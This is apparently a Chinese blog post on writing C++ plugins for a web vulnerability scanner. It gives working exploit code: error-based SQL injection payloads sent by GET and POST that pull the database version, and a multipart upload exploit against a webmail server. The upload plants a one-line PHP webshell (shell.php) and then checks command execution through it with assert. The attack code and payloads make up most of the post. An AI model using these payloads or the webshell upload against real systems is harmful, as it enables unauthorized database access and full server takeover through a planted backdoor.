关于VC编写插件的写法

发布时间:April 26, 2015 // 分类:VC/C/C++,代码学习,windows // No Comments

vc每次更新都需要重新 编译一次。好麻烦的说

首先构建一个get请求和post请求的类

void GetRequest(char *url,BOOL bRecv,BOOL bSmall)
{
    //构造get请求包  
 
    CString enUrl=url;
    enUrl.Replace(" ","%20");;
     
    CString GetPackage="";
    CString cookieValue="";
    cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue="";
    GetPackage.Format("GET %s%s HTTP/1.1\r\n"
                    "Accept: */*\r\n"
                    "Accept-Language: zh-cn\r\n"
                    //"Accept-Encoding: gzip, deflate\r\n"
                    "User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)\r\n"
                    "%s"
                    "Host: %s\r\n\r\n",
                    m_strWebRoot,enUrl,cookieValue,m_strHost.GetBuffer(0)                                       
    );
    //AfxMessageBox(GetPackage);
    //目录名 和  链接都有可能,所以对整个包进行编码
    CString encodedPack="";
    if (defaultCharset=="utf")
    {
        encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_UTF8);
    }else{
         
        encodedPack=EncodeHanzi(GetPackage,CP_ACP,CP_ACP);
    }
    //AfxMessageBox("send to target");
    sendToTarget(encodedPack.GetBuffer(0),bRecv,bSmall);
}
 
void PostRequest(char *url, char *data,BOOL bRecv)
{
    //构造Post请求包
 
    CString enUrl=url;
    enUrl.Replace(" ","%20");
//     enUrl.Replace("&","$_and_$");
//     enUrl=CParser::UrlEncode(enUrl);
//     enUrl.Replace("$_and_$","&");
 
 
    CString PostPackage="";
    CString cookieValue="";
    cookie!="" ? cookieValue ="Cookie: "+cookie+"\r\n" : cookieValue="";   
 
    //对可能有的中文进行编码
    CString encodedUrl="",encodedData="";
    if (defaultCharset=="utf8")
    {
        encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_UTF8);
        encodedData=EncodeHanzi(data,CP_ACP,CP_UTF8);
    }else{
        encodedUrl=EncodeHanzi(enUrl,CP_ACP,CP_ACP);
        encodedData=EncodeHanzi(data,CP_ACP,CP_ACP);
    }
 
    PostPackage.Format("POST %s%s HTTP/1.1\r\n"
                         "Accept: */*\r\n"
                         "Content-Type: application/x-www-form-urlencoded\r\n"
                         "Host: %s\r\n%s"
                         //"Accept-Encoding: gzip, deflate\r\n"
                         "Content-Length: %d\r\n"
                         "User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/27.0.1453.93 Safari/537.36\r\n\r\n%s",
                         m_strWebRoot,encodedUrl,m_strHost.GetBuffer(0),cookieValue.GetBuffer(0),encodedData.GetLength(),encodedData);
   
    sendToTarget(PostPackage.GetBuffer(0),bRecv);

}

然后对其进行定义参数

void makePostRequest(char *url, char *data,BOOL bRecv=FALSE);  //url 数据 是否接收服务器返回数据
    void makeGetRequest(char *url,BOOL bRecv=FALSE,BOOL bSmall=FALSE); //url 数据 是否接收服务器返回数据

然后我们再单独调用分别对GET以及Post的请求

首先是GET请求的:漏洞来源http://0day5.com/archives/3021

GetRequest("/wap/?action=show&mod=admin%20where%20userid=1%20and%20%28select%201%20from%20%28select%20count%28*%29,concat%28version(),floor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29%23",TRUE);  //发送请求以及确定要接收服务器返回的参数
    //GET请求
    CString strRet=getInfo("Duplicate entry '(.*?)'");
    //使用正则进行匹配
    if (strRet!="")  //如果strRet不为空表示存在注入
    {
        return "/wap/?action=show&mod=admin where userid存在显错式注入! 版本"+strRet;
    }

再来看一个POST请求的,漏洞详情,请关注:http://0day5.com/archives/3028

PostRequest("/delete_cart_goods.php","id=1%20and%20(select%201%20from%20(select%20count(*),concat(version(),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a)",TRUE);
//PostRequest(url,data,ture/false)
    strRet=getInfo("Duplicate entry '(.*?)'");
    if (strRet!="")
    {
        return "/delete_cart_goods.php id存在post显错式注入! 版本"+strRet;
    }

还有一个上传的方式。漏洞详情,请关注:http://0day5.com/archives/3039

它的数据包是这个样子的

POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1
Host: mail.domain.com:889
Connection: keep-alive
Content-Length: 658
Origin: http://mail.domain.com:889
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Accept: */*
Referer: http://mail.domain.com:889/src/write_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn
 
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filename"
 
vultest.php
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="PHPSESSID"
 
outb98m2mckt5a03pejd1aqra0
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="dir"
 
/var/www/newmail/
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filedata"; filename="vultest.php"
Content-Type: application/octet-stream
 
12345
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Upload"
 
Submit Query
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--

我们把它分成头部还有内容两个部分

头部是这样子的

POST http://mail.domain.com:889/src/big_att_upload.php HTTP/1.1
Host: mail.domain.com:889
Connection: keep-alive
Content-Length: 658
Origin: http://mail.domain.com:889
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36
Content-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Accept: */*
Referer: http://mail.domain.com:889/src/write_mail.php
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8,en;q=0.6,zh-TW;q=0.4
Cookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn

内容部分是这个样子的

------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filename"
 
vultest.php
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="PHPSESSID"
 
outb98m2mckt5a03pejd1aqra0
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="dir"
 
/var/www/newmail/
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Filedata"; filename="vultest.php"
Content-Type: application/octet-stream
 
12345
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5
Content-Disposition: form-data; name="Upload"
 
Submit Query
------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--

然后就好办了,对其进行转码~\r\n转换为\\r\\n  ""记得转为\"

CString uploadPack="",uploadHead="",uploadBody="";//首先我们定义个数据包,数据的头部和数据的内容
uploadBody="------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filename\"\r\n\r\nguige.php\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"PHPSESSID\"\r\n\r\noutb98m2mckt5a03pejd1aqra0\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"dir\"\r\n\r\n/var/www/newmail/\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Filedata\"; filename=\"shell.php\"\r\nContent-Type: application/octet-stream\r\n\r\n<?php @$_GET[0](@$_REQUEST[1]);?>\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nContent-Disposition: form-data; name=\"Upload\"\r\n\r\nSubmit Query\r\n------------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5--";
//这里是数据的内容
uploadHead.Format("POST /src/big_att_upload.php HTTP/1.1\r\nHost: %s\r\nConnection: keep-alive\r\nContent-Length: %d\r\nOrigin: http://%s\r\nUser-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36\r\nContent-Type: multipart/form-data; boundary=----------ei4gL6ae0Ef1GI3ei4KM7ei4Ef1Ij5\r\nAccept: */*\r\nReferer: http://%s/src/write_mail.php\r\nCookie: PHPSESSID=outb98m2mckt5a03pejd1aqra0; _HICOM[LANGUAGE]=zh-cn\r\n\r\n",
//数据的头部
m_strHost,uploadBody.GetLength(),m_strHost,m_strHost);
//得出数据的地址,内容,以及长度
uploadPack=uploadHead+uploadBody;
//对数据进行拼接组合起来
sendToTarget(uploadPack.GetBuffer(0),TRUE);
//发送数据
//判断一句话是否存在
makePostRequest("/shell.php?0=assert","1=echo 1;",TRUE);
if(GetResponseContent().Find("1",0)!=-1){
return "http://"+m_strHost+m_strWebRoot+"/guige.php?0=assert 密码1";
}

 

标签:plugins, VC

添加新评论 »

分类
最新文章
最近回复
  • 没穿底裤: 最近发现的新版本可以装在LINUX了。但是API有点变化
  • 没穿底裤: 暂时好像没有看到这个功能.
  • 没穿底裤: 这个只是一个分析,并不是使用方法哟
  • 没穿底裤: 抱歉,很久没有打理了。会不会你使用的是12版本。目前还没有遇到过这种情况
  • bao song: http://0cx.cc/php_decode_shell.jspx 这个怎么用,代码提示...